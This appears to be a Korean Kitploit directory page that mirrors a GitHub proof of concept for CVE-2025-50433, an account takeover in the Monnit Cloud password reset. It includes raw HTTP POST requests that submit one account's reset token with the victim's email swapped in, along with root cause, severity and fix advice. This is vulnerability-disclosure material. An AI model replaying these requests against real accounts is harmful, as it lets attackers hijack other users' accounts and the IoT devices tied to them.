Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-50433 — # CVE-2025-50433 개념 증명: Monnit Cloud 계정 탈취 심각한 Monnit Cloud 계정 탈취(CVE-2025-50433)에 대한 개념 증명으로, 비밀번호 재설정 과정에서 누락된 토큰-이메일 검증을 악용하며 공격 절차, 근본 원인, 그리고 해결 방안을 제공합니다. | Kitploit
도구/GitHubGitHub/0xmandor/cve-2025-50433
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingAuthentication
GitHub0xmandor/cve-2025-50433

CVE-2025-50433

# CVE-2025-50433 개념 증명: Monnit Cloud 계정 탈취 심각한 Monnit Cloud 계정 탈취(CVE-2025-50433)에 대한 개념 증명으로, 비밀번호 재설정 과정에서 누락된 토큰-이메일 검증을 악용하며 공격 절차, 근본 원인, 그리고 해결 방안을 제공합니다.

저장소 보기
19개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-50433 — Monnit Cloud Platforms(*.imonnit.com)에 영향을 미치는 치명적인 계정 탈취 취약점

요약

*.imonnit.com 전반에 걸쳐 치명적인 인증 취약점이 존재하며, 피해자 상호작용 없이 모든 사용자 계정에 대해 **전체 계정 탈취(ATO)**가 가능합니다.

백엔드가 비밀번호 재설정 토큰과 대상 이메일 간의 연결을 검증하지 못하여, 공격자가 자신의 유효한 재설정 토큰을 사용하여 모든 피해자 계정의 비밀번호를 재설정할 수 있습니다.


공격 벡터 (단계별 PoC)

  1. 공격자가 계정 A([email protected])를 생성합니다.
  2. 피해자가 계정 B([email protected])를 보유하고 있습니다.
  3. 공격자가 A와 B 모두에 대해 비밀번호 재설정을 요청합니다.
  4. 공격자가 계정 A에 대한 유효한 재설정 토큰을 받습니다.
  5. 공격자가 토큰 A를 사용하여 비밀번호 재설정 양식을 엽니다:
root@kitploit:~
    POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
    Host: www.imonnit.com
    Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2

    __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
  1. 제출 전에 공격자가 이메일 및 사용자 이름 필드를 피해자의 이메일로 변경합니다:
root@kitploit:~
    POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
    Host: www.imonnit.com
    Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2

    __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
  1. 백엔드가 잘못된 이메일+토큰 조합을 잘못 수락합니다.
  2. 피해자의 비밀번호가 재설정되고, 공격자가 피해자 계정에 대한 전체 접근 권한을 획득합니다.

영향

  • 전체 계정 탈취(ATO)
  • 피해자 대시보드, 센서 및 계정 데이터에 대한 완전한 접근
  • 장치, 알림 및 구성 수정 가능
  • 피해자 상호작용 없이 권한 상승
  • 사전 조건 없이 원격 악용 가능

심각도

CVSS 3.1: 9.8 (치명적)
벡터: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


영향을 받는 도메인

root@kitploit:~
*.imonnit.com

근본 원인

비밀번호 재설정 엔드포인트가 재설정 작업 중 제공된 이메일과 재설정 토큰이 동일한 계정에 속하는지 검증하지 않아, 공격자가 자신이 제어하는 토큰을 사용하여 임의의 비밀번호 재설정이 가능합니다.


영향을 받는 엔드포인트

root@kitploit:~
/Account/PasswordReset/

공급업체: Monnit Corporation


권장 사항

  • 백엔드에서 토큰-이메일 바인딩 검증을 엄격하게 적용하세요.
  • 토큰이 연결된 계정과 일치하지 않는 모든 비밀번호 재설정 요청을 거부하세요.
  • 사용 후 즉시 토큰을 무효화하세요.

발견자

Mohamed Mandor (0xmandor) GitHub: https://github.com/0xmandor

도구 다운로드